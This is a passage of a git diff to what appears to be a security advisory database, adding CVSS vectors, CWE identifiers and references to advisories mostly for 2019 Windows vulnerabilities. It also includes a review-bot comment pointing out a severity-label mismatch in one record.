 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-c2qm-98hf-mh5x/GHSA-c2qm-98hf-mh5x.json b/advisories/unreviewed/2022/05/GHSA-c2qm-98hf-mh5x/GHSA-c2qm-98hf-mh5x.json
index 121e9743a4c63..ecd57e0fc2f21 100644
--- a/advisories/unreviewed/2022/05/GHSA-c2qm-98hf-mh5x/GHSA-c2qm-98hf-mh5x.json
+++ b/advisories/unreviewed/2022/05/GHSA-c2qm-98hf-mh5x/GHSA-c2qm-98hf-mh5x.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c2qm-98hf-mh5x",
- "modified": "2022-05-24T16:53:29Z",
+ "modified": "2026-02-20T21:31:09Z",
 "published": "2022-05-24T16:53:29Z",
 "aliases": [
 "CVE-2019-1159"
 ],
 "details": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1164.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-ggpr-x33h-6668/GHSA-ggpr-x33h-6668.json b/advisories/unreviewed/2022/05/GHSA-ggpr-x33h-6668/GHSA-ggpr-x33h-6668.json
index 0cce3d9c27658..6346634989b9e 100644
--- a/advisories/unreviewed/2022/05/GHSA-ggpr-x33h-6668/GHSA-ggpr-x33h-6668.json
+++ b/advisories/unreviewed/2022/05/GHSA-ggpr-x33h-6668/GHSA-ggpr-x33h-6668.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-ggpr-x33h-6668",
- "modified": "2022-05-24T16:53:34Z",
+ "modified": "2026-02-20T21:31:11Z",
 "published": "2022-05-24T16:53:34Z",
 "aliases": [
 "CVE-2019-1212"
 ],
 "details": "A memory corruption vulnerability exists in the Windows Server DHCP service when processing specially crafted packets, aka 'Windows DHCP Server Denial of Service Vulnerability'. This CVE ID is unique from CVE-2019-1206.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -20,7 +25,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-787"
+ ],
 "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-gj34-2m5p-98wq/GHSA-gj34-2m5p-98wq.json b/advisories/unreviewed/2022/05/GHSA-gj34-2m5p-98wq/GHSA-gj34-2m5p-98wq.json
index 102d8981837c1..7b0a9f7ae0a9d 100644
--- a/advisories/unreviewed/2022/05/GHSA-gj34-2m5p-98wq/GHSA-gj34-2m5p-98wq.json
+++ b/advisories/unreviewed/2022/05/GHSA-gj34-2m5p-98wq/GHSA-gj34-2m5p-98wq.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gj34-2m5p-98wq",
- "modified": "2022-05-24T16:53:29Z",
+ "modified": "2026-02-20T21:31:09Z",
 "published": "2022-05-24T16:53:29Z",
 "aliases": [
 "CVE-2019-1156"
 ],
 "details": "A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1146, CVE-2019-1147, CVE-2019-1155, CVE-2019-1157.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
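Review bot: In GHSA-ggpr-x33h-6668 (CVE-2019-1212) the added vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` does not agree with the `"severity": "HIGH"` label that the file's second hunk leaves unchanged; the identical vector on GHSA-p5w8-9jhp-rccp in this same sync sits beside `"severity": "CRITICAL"`. It also reads oddly against the advisory's own title, 'Windows DHCP Server Denial of Service Vulnerability', whose sibling CVE-2019-1206 (GHSA-534v-m7q8-9qgf) is given `C:N/I:N/A:H`. Consumers that triage on `database_specific.severity` will rank this record lower than consumers that score the vector, so one of the two fields should be reconciled with the upstream record before the advisory is relied on for prioritisation.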
diff --git a/advisories/unreviewed/2022/05/GHSA-j4m7-8245-9345/GHSA-j4m7-8245-9345.json b/advisories/unreviewed/2022/05/GHSA-j4m7-8245-9345/GHSA-j4m7-8245-9345.json
index 60bdddef3abaa..5f6eaab8f2bd5 100644
--- a/advisories/unreviewed/2022/05/GHSA-j4m7-8245-9345/GHSA-j4m7-8245-9345.json
+++ b/advisories/unreviewed/2022/05/GHSA-j4m7-8245-9345/GHSA-j4m7-8245-9345.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-j4m7-8245-9345",
- "modified": "2022-05-24T17:48:05Z",
+ "modified": "2026-02-20T21:31:13Z",
 "published": "2022-05-24T17:48:05Z",
 "aliases": [
 "CVE-2021-21526"
 ],
 "details": "Dell PowerScale OneFS 8.1.0 - 9.1.0 contains a privilege escalation in SmartLock compliance mode that may allow compadmin to execute arbitrary commands as root.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-j5jh-cv7m-3763/GHSA-j5jh-cv7m-3763.json b/advisories/unreviewed/2022/05/GHSA-j5jh-cv7m-3763/GHSA-j5jh-cv7m-3763.json
index ebec35732c317..bc5bc97790141 100644
--- a/advisories/unreviewed/2022/05/GHSA-j5jh-cv7m-3763/GHSA-j5jh-cv7m-3763.json
+++ b/advisories/unreviewed/2022/05/GHSA-j5jh-cv7m-3763/GHSA-j5jh-cv7m-3763.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-j5jh-cv7m-3763",
- "modified": "2022-05-24T16:53:31Z",
+ "modified": "2026-02-20T21:31:09Z",
 "published": "2022-05-24T16:53:31Z",
 "aliases": [
 "CVE-2019-1176"
 ],
 "details": "An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Elevation of Privilege Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-j5p2-jf5p-h3rm/GHSA-j5p2-jf5p-h3rm.json b/advisories/unreviewed/2022/05/GHSA-j5p2-jf5p-h3rm/GHSA-j5p2-jf5p-h3rm.json
index e303f79376acf..9c8cb0fa13f97 100644
--- a/advisories/unreviewed/2022/05/GHSA-j5p2-jf5p-h3rm/GHSA-j5p2-jf5p-h3rm.json
+++ b/advisories/unreviewed/2022/05/GHSA-j5p2-jf5p-h3rm/GHSA-j5p2-jf5p-h3rm.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-j5p2-jf5p-h3rm",
- "modified": "2022-05-24T16:53:30Z",
+ "modified": "2026-02-20T21:31:09Z",
 "published": "2022-05-24T16:53:30Z",
 "aliases": [
 "CVE-2019-1168"
 ],
 "details": "An elevation of privilege exists in the p2pimsvc service where an attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.To exploit this vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Windows p2pimsvc Elevation of Privilege Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-m3wq-w5qf-gpqg/GHSA-m3wq-w5qf-gpqg.json b/advisories/unreviewed/2022/05/GHSA-m3wq-w5qf-gpqg/GHSA-m3wq-w5qf-gpqg.json
index 8c6085513bff1..a8a429ebd04dd 100644
--- a/advisories/unreviewed/2022/05/GHSA-m3wq-w5qf-gpqg/GHSA-m3wq-w5qf-gpqg.json
+++ b/advisories/unreviewed/2022/05/GHSA-m3wq-w5qf-gpqg/GHSA-m3wq-w5qf-gpqg.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m3wq-w5qf-gpqg",
- "modified": "2022-05-24T16:53:34Z",
+ "modified": "2026-02-20T21:31:11Z",
 "published": "2022-05-24T16:53:34Z",
 "aliases": [
 "CVE-2019-1218"
 ],
 "details": "A spoofing vulnerability exists in the way Microsoft Outlook iOS software parses specifically crafted email messages, aka 'Outlook iOS Spoofing Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -20,7 +25,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-79"
+ ],
 "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-mhjc-pqhq-cf8c/GHSA-mhjc-pqhq-cf8c.json b/advisories/unreviewed/2022/05/GHSA-mhjc-pqhq-cf8c/GHSA-mhjc-pqhq-cf8c.json
index ab2a610094c31..6667b7d276878 100644
--- a/advisories/unreviewed/2022/05/GHSA-mhjc-pqhq-cf8c/GHSA-mhjc-pqhq-cf8c.json
+++ b/advisories/unreviewed/2022/05/GHSA-mhjc-pqhq-cf8c/GHSA-mhjc-pqhq-cf8c.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mhjc-pqhq-cf8c",
- "modified": "2022-05-24T16:53:33Z",
+ "modified": "2026-02-20T21:31:10Z",
 "published": "2022-05-24T16:53:33Z",
 "aliases": [
 "CVE-2019-1201"
 ],
 "details": "A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory, aka 'Microsoft Word Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1205.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-p5w8-9jhp-rccp/GHSA-p5w8-9jhp-rccp.json b/advisories/unreviewed/2022/05/GHSA-p5w8-9jhp-rccp/GHSA-p5w8-9jhp-rccp.json
index 92a31555f9cb7..f599062974bf7 100644
--- a/advisories/unreviewed/2022/05/GHSA-p5w8-9jhp-rccp/GHSA-p5w8-9jhp-rccp.json
+++ b/advisories/unreviewed/2022/05/GHSA-p5w8-9jhp-rccp/GHSA-p5w8-9jhp-rccp.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-p5w8-9jhp-rccp",
- "modified": "2022-05-24T16:53:27Z",
+ "modified": "2026-02-20T21:31:08Z",
 "published": "2022-05-24T16:53:27Z",
 "aliases": [
 "CVE-2019-0736"
 ],
 "details": "A memory corruption vulnerability exists in the Windows DHCP client when an attacker sends specially crafted DHCP responses to a client, aka 'Windows DHCP Client Remote Code Execution Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -20,7 +25,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-787"
+ ],
 "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-qcg4-w26w-fjv8/GHSA-qcg4-w26w-fjv8.json b/advisories/unreviewed/2022/05/GHSA-qcg4-w26w-fjv8/GHSA-qcg4-w26w-fjv8.json
index 539ec13effd83..0f08b8404b667 100644
--- a/advisories/unreviewed/2022/05/GHSA-qcg4-w26w-fjv8/GHSA-qcg4-w26w-fjv8.json
+++ b/advisories/unreviewed/2022/05/GHSA-qcg4-w26w-fjv8/GHSA-qcg4-w26w-fjv8.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qcg4-w26w-fjv8",
- "modified": "2024-06-03T18:53:39Z",
+ "modified": "2026-02-20T21:31:12Z",
 "published": "2022-05-24T22:28:54Z",
 "aliases": [
 "CVE-2019-1226"
 ],
 "details": "A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services? Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1181, CVE-2019-1182, CVE-2019-1222.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-qvf2-39c6-g8rr/GHSA-qvf2-39c6-g8rr.json b/advisories/unreviewed/2022/05/GHSA-qvf2-39c6-g8rr/GHSA-qvf2-39c6-g8rr.json
index 3aa0764627749..845132b159dc2 100644
--- a/advisories/unreviewed/2022/05/GHSA-qvf2-39c6-g8rr/GHSA-qvf2-39c6-g8rr.json
+++ b/advisories/unreviewed/2022/05/GHSA-qvf2-39c6-g8rr/GHSA-qvf2-39c6-g8rr.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qvf2-39c6-g8rr",
- "modified": "2024-06-03T18:53:38Z",
+ "modified": "2026-02-20T21:31:11Z",
 "published": "2022-05-24T22:28:55Z",
 "aliases": [
 "CVE-2019-1222"
 ],
 "details": "A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services? Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1181, CVE-2019-1182, CVE-2019-1226.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-qxww-2h29-62jj/GHSA-qxww-2h29-62jj.json b/advisories/unreviewed/2022/05/GHSA-qxww-2h29-62jj/GHSA-qxww-2h29-62jj.json
index 314cc81ace2f1..1c4715ac98dcb 100644
--- a/advisories/unreviewed/2022/05/GHSA-qxww-2h29-62jj/GHSA-qxww-2h29-62jj.json
+++ b/advisories/unreviewed/2022/05/GHSA-qxww-2h29-62jj/GHSA-qxww-2h29-62jj.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qxww-2h29-62jj",
- "modified": "2022-05-24T16:53:34Z",
+ "modified": "2026-02-20T21:31:11Z",
 "published": "2022-05-24T16:53:34Z",
 "aliases": [
 "CVE-2019-1223"
 ],
 "details": "A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka 'Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-r62x-fmfh-f3x7/GHSA-r62x-fmfh-f3x7.json b/advisories/unreviewed/2022/05/GHSA-r62x-fmfh-f3x7/GHSA-r62x-fmfh-f3x7.json
index e74d4ac1de2d3..e553262e02506 100644
--- a/advisories/unreviewed/2022/05/GHSA-r62x-fmfh-f3x7/GHSA-r62x-fmfh-f3x7.json
+++ b/advisories/unreviewed/2022/05/GHSA-r62x-fmfh-f3x7/GHSA-r62x-fmfh-f3x7.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r62x-fmfh-f3x7",
- "modified": "2022-05-24T16:53:28Z",
+ "modified": "2026-02-20T21:31:09Z",
 "published": "2022-05-24T16:53:28Z",
 "aliases": [
 "CVE-2019-1133"
 ],
 "details": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1194.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -20,7 +25,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-787"
+ ],
 "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-rq2v-5grq-h5mc/GHSA-rq2v-5grq-h5mc.json b/advisories/unreviewed/2022/05/GHSA-rq2v-5grq-h5mc/GHSA-rq2v-5grq-h5mc.json
index 7c977bec75e94..753e8d49ba542 100644
--- a/advisories/unreviewed/2022/05/GHSA-rq2v-5grq-h5mc/GHSA-rq2v-5grq-h5mc.json
+++ b/advisories/unreviewed/2022/05/GHSA-rq2v-5grq-h5mc/GHSA-rq2v-5grq-h5mc.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rq2v-5grq-h5mc",
- "modified": "2022-05-24T16:53:32Z",
+ "modified": "2026-02-20T21:31:10Z",
 "published": "2022-05-24T16:53:32Z",
 "aliases": [
 "CVE-2019-1190"
 ],
 "details": "An elevation of privilege vulnerability exists in the way that the Windows kernel image handles objects in memory.An attacker who successfully exploited the vulnerability could execute code with elevated permissions.To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.The security update addresses the vulnerability by ensuring the Windows kernel image properly handles objects in memory., aka 'Windows Image Elevation of Privilege Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-vmp9-r9rc-8gc7/GHSA-vmp9-r9rc-8gc7.json b/advisories/unreviewed/2022/05/GHSA-vmp9-r9rc-8gc7/GHSA-vmp9-r9rc-8gc7.json
index 518471a77ccb8..dcb38e9d37680 100644
--- a/advisories/unreviewed/2022/05/GHSA-vmp9-r9rc-8gc7/GHSA-vmp9-r9rc-8gc7.json
+++ b/advisories/unreviewed/2022/05/GHSA-vmp9-r9rc-8gc7/GHSA-vmp9-r9rc-8gc7.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vmp9-r9rc-8gc7",
- "modified": "2022-05-24T16:53:30Z",
+ "modified": "2026-02-20T21:31:09Z",
 "published": "2022-05-24T16:53:30Z",
 "aliases": [
 "CVE-2019-1155"
 ],
 "details": "A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1146, CVE-2019-1147, CVE-2019-1156, CVE-2019-1157.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-vw2q-fc9j-fxwx/GHSA-vw2q-fc9j-fxwx.json b/advisories/unreviewed/2022/05/GHSA-vw2q-fc9j-fxwx/GHSA-vw2q-fc9j-fxwx.json
index 84ac30f30f38d..e1b54bd1db988 100644
--- a/advisories/unreviewed/2022/05/GHSA-vw2q-fc9j-fxwx/GHSA-vw2q-fc9j-fxwx.json
+++ b/advisories/unreviewed/2022/05/GHSA-vw2q-fc9j-fxwx/GHSA-vw2q-fc9j-fxwx.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vw2q-fc9j-fxwx",
- "modified": "2022-05-24T16:53:28Z",
+ "modified": "2026-02-20T21:31:09Z",
 "published": "2022-05-24T16:53:28Z",
 "aliases": [
 "CVE-2019-1149"
 ],
 "details": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka 'Microsoft Graphics Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1144, CVE-2019-1145, CVE-2019-1150, CVE-2019-1151, CVE-2019-1152.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -24,7 +29,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-787"
+ ],
 "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-vw3c-3fmq-qpgq/GHSA-vw3c-3fmq-qpgq.json b/advisories/unreviewed/2022/05/GHSA-vw3c-3fmq-qpgq/GHSA-vw3c-3fmq-qpgq.json
index 986a4f7d0a780..7991dc656b2ff 100644
--- a/advisories/unreviewed/2022/05/GHSA-vw3c-3fmq-qpgq/GHSA-vw3c-3fmq-qpgq.json
+++ b/advisories/unreviewed/2022/05/GHSA-vw3c-3fmq-qpgq/GHSA-vw3c-3fmq-qpgq.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vw3c-3fmq-qpgq",
- "modified": "2024-06-03T18:53:36Z",
+ "modified": "2026-02-20T21:31:10Z",
 "published": "2022-05-24T22:29:00Z",
 "aliases": [
 "CVE-2019-1182"
 ],
 "details": "A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services? Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1181, CVE-2019-1222, CVE-2019-1226.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-w8p3-q4q6-xq79/GHSA-w8p3-q4q6-xq79.json b/advisories/unreviewed/2022/05/GHSA-w8p3-q4q6-xq79/GHSA-w8p3-q4q6-xq79.json
index 31c6a67a490e5..f8f4b3ea313c2 100644
--- a/advisories/unreviewed/2022/05/GHSA-w8p3-q4q6-xq79/GHSA-w8p3-q4q6-xq79.json
+++ b/advisories/unreviewed/2022/05/GHSA-w8p3-q4q6-xq79/GHSA-w8p3-q4q6-xq79.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-w8p3-q4q6-xq79",
- "modified": "2024-06-03T18:53:36Z",
+ "modified": "2026-02-20T21:31:10Z",
 "published": "2022-05-24T22:29:01Z",
 "aliases": [
 "CVE-2019-1181"
 ],
 "details": "A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services? Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1182, CVE-2019-1222, CVE-2019-1226.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-wqw7-2chg-rhcv/GHSA-wqw7-2chg-rhcv.json b/advisories/unreviewed/2022/05/GHSA-wqw7-2chg-rhcv/GHSA-wqw7-2chg-rhcv.json
index 8a4bbd2b74820..131c4e493ca1a 100644
--- a/advisories/unreviewed/2022/05/GHSA-wqw7-2chg-rhcv/GHSA-wqw7-2chg-rhcv.json
+++ b/advisories/unreviewed/2022/05/GHSA-wqw7-2chg-rhcv/GHSA-wqw7-2chg-rhcv.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wqw7-2chg-rhcv",
- "modified": "2022-05-24T16:53:28Z",
+ "modified": "2026-02-20T21:31:09Z",
 "published": "2022-05-24T16:53:28Z",
 "aliases": [
 "CVE-2019-1146"
 ],
 "details": "A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1147, CVE-2019-1155, CVE-2019-1156, CVE-2019-1157.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-xhpj-r5xj-f4j3/GHSA-xhpj-r5xj-f4j3.json b/advisories/unreviewed/2022/05/GHSA-xhpj-r5xj-f4j3/GHSA-xhpj-r5xj-f4j3.json
index a1e265014bee1..af59d7b994ef5 100644
--- a/advisories/unreviewed/2022/05/GHSA-xhpj-r5xj-f4j3/GHSA-xhpj-r5xj-f4j3.json
+++ b/advisories/unreviewed/2022/05/GHSA-xhpj-r5xj-f4j3/GHSA-xhpj-r5xj-f4j3.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xhpj-r5xj-f4j3",
- "modified": "2022-05-24T16:53:29Z",
+ "modified": "2026-02-20T21:31:09Z",
 "published": "2022-05-24T16:53:29Z",
 "aliases": [
 "CVE-2019-1153"
 ],
 "details": "An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory, aka 'Microsoft Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1078, CVE-2019-1148.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -24,7 +29,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-125"
+ ],
 "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2023/08/GHSA-g5c7-69g3-565r/GHSA-g5c7-69g3-565r.json b/advisories/unreviewed/2023/08/GHSA-g5c7-69g3-565r/GHSA-g5c7-69g3-565r.json
index 20dcdc81284bd..8f6fdbcf6f840 100644
--- a/advisories/unreviewed/2023/08/GHSA-g5c7-69g3-565r/GHSA-g5c7-69g3-565r.json
+++ b/advisories/unreviewed/2023/08/GHSA-g5c7-69g3-565r/GHSA-g5c7-69g3-565r.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-g5c7-69g3-565r",
- "modified": "2024-09-19T00:31:32Z",
+ "modified": "2026-02-20T21:31:14Z",
 "published": "2023-08-31T03:30:36Z",
 "aliases": [
 "CVE-2023-4162"
diff --git a/advisories/unreviewed/2024/12/GHSA-ghpw-cph8-v3rm/GHSA-ghpw-cph8-v3rm.json b/advisories/unreviewed/2024/12/GHSA-ghpw-cph8-v3rm/GHSA-ghpw-cph8-v3rm.json
index 1466b1e014fe2..b42d0bcc38526 100644
--- a/advisories/unreviewed/2024/12/GHSA-ghpw-cph8-v3rm/GHSA-ghpw-cph8-v3rm.json
+++ b/advisories/unreviewed/2024/12/GHSA-ghpw-cph8-v3rm/GHSA-ghpw-cph8-v3rm.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-ghpw-cph8-v3rm",
- "modified": "2025-03-18T00:30:36Z",
+ "modified": "2026-02-20T21:31:15Z",
 "published": "2024-12-18T18:30:52Z",
 "aliases": [
 "CVE-2024-55089"
@@ -19,6 +19,14 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55089"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rhymix/rhymix/commit/464985b1ef382cc8cf852e9b028a960aa58b40c3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://rhymix.org/news/1909005"
+ },
 {
 "type": "WEB",
 "url": "https://tasteful-stamp-da4.notion.site/CVE-2024-55089-15b1e0f227cb8064a563c697709b7530?pvs=73"
@@ -26,7 +34,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-352"
+ "CWE-352",
+ "CWE-918"
 ],
 "severity": "CRITICAL",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2025/12/GHSA-qqrg-hpxx-mmvw/GHSA-qqrg-hpxx-mmvw.json b/advisories/unreviewed/2025/12/GHSA-qqrg-hpxx-mmvw/GHSA-qqrg-hpxx-mmvw.json
index 96aae5bc0722d..2ca0d5403f713 100644
